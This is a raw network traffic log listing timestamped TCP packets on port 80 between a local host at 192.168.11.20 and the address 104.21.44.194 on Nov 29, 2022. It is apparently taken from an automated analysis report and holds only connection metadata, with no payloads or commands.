                                                                          Nov 29, 2022 09:20:40.701090097 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.701090097 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.701090097 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.701090097 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.701090097 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.701109886 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.709630966 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.709724903 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.709738970 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.709748983 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.709850073 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.709851027 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.709865093 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.709883928 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.709897041 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.709908009 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.709919930 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.709939003 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.709955931 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.709966898 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.709984064 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.709997892 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.710009098 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.710020065 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.710038900 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.710053921 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.710066080 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.710078955 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.710097075 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.710108995 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.710115910 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.710115910 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.710115910 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.710115910 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.710115910 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.710115910 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.710115910 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.710115910 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.710122108 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.710136890 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.710151911 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.710165024 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.710176945 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.710195065 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.710208893 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.710218906 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.710232019 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.710248947 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.710263014 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.710274935 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.710278988 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.710278988 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.710289001 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.710305929 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.710319042 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.710330009 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.710345030 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.710360050 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.710367918 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.710367918 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.710367918 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.710367918 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.710367918 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.710371971 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.710385084 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.710396051 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.710407972 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.710419893 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.710432053 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.710443974 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.710454941 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.710537910 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.710537910 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.710537910 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.710537910 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.710537910 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.710705996 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.710705996 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.719664097 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.719767094 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.719824076 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.719845057 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.719852924 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.719871998 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.719890118 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.719919920 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.719938040 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.719969034 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.719990015 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720009089 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720009089 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720009089 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720026016 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720046043 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720082045 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720122099 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720149040 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720180035 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720180035 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720180035 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720180035 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720180035 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720180035 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720180035 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720180035 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720184088 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720211029 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720230103 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720248938 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720280886 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720299959 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720345020 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720371008 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720387936 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720411062 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720432997 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720453978 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720474005 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720494032 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720513105 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720532894 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720544100 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720544100 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720544100 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720545053 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720545053 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720545053 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720556021 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720576048 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720597982 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720622063 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720642090 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720659971 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720679045 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720694065 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720705032 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720716000 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720726967 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720750093 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720751047 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720751047 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720751047 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720751047 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720751047 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720751047 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720751047 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720762014 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720773935 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720784903 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720794916 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720805883 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720817089 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720900059 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720900059 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720900059 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.721098900 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.732968092 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733071089 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733083010 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733093977 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733113050 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733124018 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733175993 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733184099 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.733252048 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733263969 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733274937 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733293056 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733304024 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733320951 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733351946 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.733361006 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733382940 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733402014 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733413935 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733424902 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733460903 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733474970 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733494997 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733506918 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733517885 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733520985 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.733520985 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.733521938 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.733521938 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.733521938 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.733530045 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733549118 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733561039 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733572960 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733584881 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733596087 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733694077 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.733694077 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.733694077 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.733694077 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.733860970 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.866101980 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.874612093 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.874726057 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.874758959 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.874772072 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.874783993 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.874802113 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.874814034 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.874825954 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.874839067 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.874859095 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.874862909 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.874871016 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.874897003 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.874933004 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.874944925 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.874968052 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.874979973 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.874990940 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875031948 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875036001 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875036001 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875045061 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875087976 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875102997 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875123024 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875134945 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875145912 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875168085 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875197887 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875200987 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875200987 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875200987 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875200987 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875221968 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875252962 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875283957 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875299931 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875319958 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875332117 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875344038 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875370979 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875370979 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875370979 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875370979 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875370979 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875372887 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875370979 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875370979 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875370979 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875386000 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875397921 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875427961 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875441074 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875452042 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875473976 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875485897 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875497103 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875509024 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875541925 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875541925 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875541925 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875541925 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875546932 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875560045 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875586033 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875601053 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875631094 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875653982 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875669003 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875682116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875682116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875682116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875682116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875682116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875682116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875683069 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875683069 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875688076 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875699997 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875710964 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875734091 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875746012 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875756025 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875767946 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875783920 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875796080 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875807047 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875818014 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875842094 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875854015 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875854015 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875854015 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875854015 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875854015 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875854969 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875864983 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875885963 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875896931 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875909090 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875920057 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875941038 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875952959 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875963926 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875974894 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875993013 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.876004934 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.876015902 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.876025915 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.876025915 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.876025915 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.876027107 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.876025915 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.876025915 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.876043081 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.876055002 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.876092911 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.876111984 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.876126051 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.876137972 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.876157999 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.876169920 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.876182079 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.876195908 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.876216888 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.876229048 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.876243114 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.876243114 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.876243114 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.876243114 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.876243114 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.876244068 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.876243114 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.876243114 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.876243114 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.876282930 CET8049852104.21.44.194192.168.11.20
